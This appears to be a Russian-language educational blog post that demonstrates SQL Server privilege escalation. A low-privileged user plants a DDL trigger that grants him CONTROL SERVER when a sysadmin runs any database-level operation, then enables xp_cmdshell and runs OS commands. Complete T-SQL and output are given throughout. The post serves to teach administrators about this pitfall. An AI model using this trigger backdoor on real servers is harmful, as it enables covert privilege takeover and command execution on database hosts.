| 
  | 
|||||||||||||||||||||||||||||
  | 
 Эскалация привилегий при помощи DDL-триггеровИсточник: blogstechnet 
В предыдущей задаче пользователь alexejs находился в роли sysadmin. На самом деле это совершенно необязательно, т.к. триггер выполняется в контексте пользователя, вызвавшего его срабатывание, в данном случае изменение членства в роли. Пользователю alexejs достаточно иметь права на создание триггера на какую-нибудь DDL-операцию, чтобы заложить туда мину. Когда ничего не подозревающий сисадмин в лице девушки Юли ее выполнит, мина сработает от ее имени и в контексте ее прав. Пользователь alexejs может этим воспользоваться, чтобы незаметно поднять себе права или выполнить еще какие-нибудь нехорошие действия. Здесь необходимо принимать во внимание психологический аспект. Если бы alexejs написал то же в виде процедуры, принес бы ее девушке Юле и сказал, на, выполни, та, скорее всего, насторожилась бы. Но от безобидной операции навроде создания таблицы или добавления колонки или и т.д. она инстинктивно не ждет подвохов, чем в данном случае могут воспользоваться разные недобросовестные личности. Понятно, что в здравом уме никто не даст пользователю alexejs сисадминских полномочий. Его вообще, по-хорошему, не стоило пускать на сервер. Однако там имеется база данных blog, с которой, к сожалению, он должен работать. use master if exists(select 1 from sys.databases where name = 'blog') begin  alter database blog set single_user with rollback immediate  drop database blog end create database blog if exists(select 1 from sys.server_principals where name = 'alexejs') drop login alexejs  create login alexejs with password = 'isvrus', check_policy = off, default_database = blog use blog  if exists(select 1 from sys.database_principals where name = 'alexejs') drop user alexejs  create user alexejs from login alexejs grant alter on database::blog to alexejs Скрипт 1 По каким-то своим темным соображениям пользователь alexejs хотел бы иметь включенной xp_cmdshell на сервере, но его прав на то, чтобы ее включить, не хватает. exec sp_configure 'xp_cmdshell', 1 Msg 15247, Level 16, State 1, Procedure sp_configure, Line 94 User does not have permission to perform this action. Скрипт 2 select * from fn_my_permissions(null, 'server') order by subentity_name, permission_name entity_name         subentity_name             permission_name ------------------------------------------------------------------------- server                                         CONNECT SQL server                                         VIEW ANY DATABASE (2 row(s) affected) Скрипт 3 Просить девушку Юлю об этом бессмысленно, т.к. она собирается проходить сертификацию Works with SQL Server 2008 и специально задисейблила xp_cmdshell. Поэтому alexejs создает в БД blog таблицу с неприличным названием if OBJECT_ID(' Неприличное слово', 'U') is not null drop table  [Неприличное слово] create table [Неприличное слово] (id int identity) Скрипт 4 и DDL-триггер if exists(select 1 from sys.triggers where parent_class_desc = 'DATABASE' and name = 'Zakladka')  drop trigger Zakladka on database  go  create trigger Zakladka on database for DDL_DATABASE_LEVEL_EVENTS as  if is_srvrolemember('sysadmin') = 1  exec sp_executesql N'use master; grant control server to alexejs'  go Скрипт 5 который он для гарантии вешает сразу на все операции уровня базы, потому что когда девушка Юля увидит неприличное слово, ее терпение может закончиться и она начнет, например, не с переименования этой таблицы, а с удаления пользователя alexejs.  use blog  drop user alexejs Command(s) completed successfully. Скрипт 6 В триггере проверяется, что его вызвал сисадмин, после чего от имени этого сисадмина пользователю alexejs выдаются права управления сервером. Это немножко меньше, чем явное включение в серверную роль sysadmin, например, alexejs не сможет сделать exec sp_dropsrvrolemember 'julia', 'sysadmin', но для наших нужд достаточно. Проверим по-новой права alexejs на сервере после того, как закладка сработает: select * from fn_my_permissions(null, 'server') order by subentity_name, permission_name entity_name   subentity_name       permission_name ------------------------------------------------------------------------- server                             ADMINISTER BULK OPERATIONS server                             ALTER ANY CONNECTION server                             ALTER ANY CREDENTIAL server                             ALTER ANY DATABASE server                             ALTER ANY ENDPOINT server                             ALTER ANY EVENT NOTIFICATION server                             ALTER ANY LINKED SERVER server                             ALTER ANY LOGIN server                             ALTER ANY SERVER AUDIT server                             ALTER RESOURCES server                             ALTER SERVER STATE server                             ALTER SETTINGS server                             ALTER TRACE server                             AUTHENTICATE SERVER server                             CONNECT SQL server                             CONTROL SERVER server                             CREATE ANY DATABASE server                             CREATE DDL EVENT NOTIFICATION server                             CREATE ENDPOINT server                             CREATE TRACE EVENT NOTIFICATION server                             EXTERNAL ACCESS ASSEMBLY server                             SHUTDOWN server                             UNSAFE ASSEMBLY server                             VIEW ANY DATABASE server                             VIEW ANY DEFINITION server                             VIEW SERVER STATE Скрипт 7 У меня такое чувство, что этот список несколько расширился по сравнению с тем, что мы видели поначалу (Скрипт 3).  После этого пользователь alexejs как ни в чем не бывало заходит в БД blog, из которой его только что убила девушка Юля. Сработавший при этом триггер выдал логину права, в частности, на ALTER ANY DATABASE, поэтому он немедленно в ней возродился. Более того, теперь он может заходить и модифицировать не только БД blog, но и все остальные базы на сервере, к которым раньше у него не было доступа, а также выполнять большинство серверных операций. В частности, привилегия ALTER SETTINGS позволяет ему включить xp_cmdshell, из-за которой (Скрипт 2) затеялся весь этот сыр-бор  exec sp_configure 'xp_cmdshell', 1 reconfigure with override exec xp_cmdshell 'dir c:\' Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install. output ----------------------------------------------------------------------------------------------------  Volume in drive C has no label.  Volume Serial Number is 5019-C968 NULL  Directory of c:\ NULL 11/06/2009  12:42 AM                24 autoexec.bat 11/06/2009  12:42 AM                10 config.sys 08/10/2009  06:53 AM    <DIR>          Demo 28/11/2009  02:28 PM    <DIR>          Distrib 01/10/2009  10:22 AM    <DIR>          inetpub 07/10/2009  11:15 AM    <DIR>          My Documents 14/07/2009  05:37 AM    <DIR>          PerfLogs 11/11/2009  01:02 PM    <DIR>          Program Files 09/12/2009  09:54 PM    <DIR>          Temp 11/11/2009  01:26 PM    <DIR>          Users 21/10/2009  02:29 AM    <DIR>          Windows                2 File(s)             34 bytes                9 Dir(s)  115,160,350,720 bytes free NULL (19 row(s) affected) Скрипт 8 Домашнее задание. Как должна была действовать девушка Юля, чтобы осуществить задуманное (переименовать таблицу, дропнуть пользователя), но при этом не наступить на грабли, подложенные пользователем alexejs? Выявление и обезвреживание триггера не рассматриваем, т.к. это тривиально. Триггер пусть остается висеть взведенным. Ссылки по теме 
  | 
 | 
|||||||